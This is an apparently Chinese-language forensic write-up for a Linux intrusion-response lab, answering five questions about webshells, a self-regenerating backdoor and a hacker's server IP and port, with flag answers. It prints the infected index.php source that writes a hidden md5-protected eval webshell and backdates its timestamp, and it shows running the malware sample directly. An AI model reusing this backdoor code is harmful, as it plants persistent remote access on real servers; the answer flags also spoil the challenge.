1
2
3
4
5
6
7
账号:root 密码:linuxruqin
ssh root@IP
1.web目录存在木马,请找到木马的密码提交
2.服务器疑似存在不死马,请找到不死马的密码提交
3.不死马是通过哪个文件生成的,请提交文件名
4.黑客留下了木马文件,请找出黑客的服务器ip提交
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交

1.web目录存在木马,请找到木马的密码提交

D盾扫一下

image-20240410190030384

image-20240410185930307

也可以使用命令grep -nr "eval" .发现有1.php、index.php、.shell.php三个文件包含eval字符串

1.php是简单的一句话木马

.shell.php和index.php都是木马且有md5密码校验

答案:flag{1}

2.服务器疑似存在不死马,请找到不死马的密码提交

image-20240410190003072

将md5解密得到hello

image-20240410190728669

答案:flag{hello}

3.不死马是通过哪个文件生成的,请提交文件名

image-20240410185946902

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
// 引入配置文件
include('config.php');

// 引入公共函数库
include(SYS_ROOT.INC.'common.php');

// 获取当前请求的PATH_INFO(URL路径信息)以及查询字符串,并处理成标准格式
$path = $_SERVER['PATH_INFO'];
$queryString = $_SERVER['QUERY_STRING'];
if (!empty($queryString)) {
$path .= '?' . str_replace('?', '', $queryString);
}

// 如果路径信息以'/'开头,则去掉第一个'/'
if (substr($path, 0, 1) == '/') {
$path = substr($path, 1);
}

// 对路径进行安全过滤或转义(具体实现取决于Base::safeword()方法)
$path = Base::safeword($path);

// 获取GET参数中的'action'值作为控制器方法,如果没有则默认为'run'
$ctrl = isset($_GET['action']) ? $_GET['action'] : 'run';

// 检查是否存在'createprocess'这个GET参数,如果存在则调用Index类的createhtml方法生成静态页面
if (isset($_GET['createprocess'])) {
Index::createhtml(isset($_GET['id']) ? $_GET['id'] : 0, $_GET['cat'], $_GET['single']);
} else {
// 否则调用Index类的run方法处理请求
Index::run($path);
}

// 创建恶意PHP脚本文件,并写入内容
// 当传入的POST参数"pass"经过md5加密后等于特定字符串时,会执行POST参数"cmd"中的PHP代码
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);

// 修改shell.php文件的修改时间为2021年1月1日0点0分1秒,用于规避一些基于时间的检测机制
system('touch -m -d "2021-01-01 00:00:01" .shell.php');

// 暂停程序执行3毫秒
usleep(3000);

index.php一直生成.shell.php

答案:flag{index.php}

4.黑客留下了木马文件,请找出黑客的服务器ip提交

答案:flag{10.11.55.21}

5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交

答案:flag{3333}

第四题和第五题有两种方法

方法一:

直接在服务器上运行一下木马文件(真实环境不建议使用)

1
2
3
root@ip-10-0-10-1:/var/www/html# chmod 777 shell\(1\).elf 
root@ip-10-0-10-1:/var/www/html# ./shell\(1\).elf
netstat -antlp

image-20240410185850373

方法二:

使用云沙箱进行分析

我这里使用的沙箱是https://www.virustotal.com/(也可以用其他的比如微步、360的)

image-20240410194712797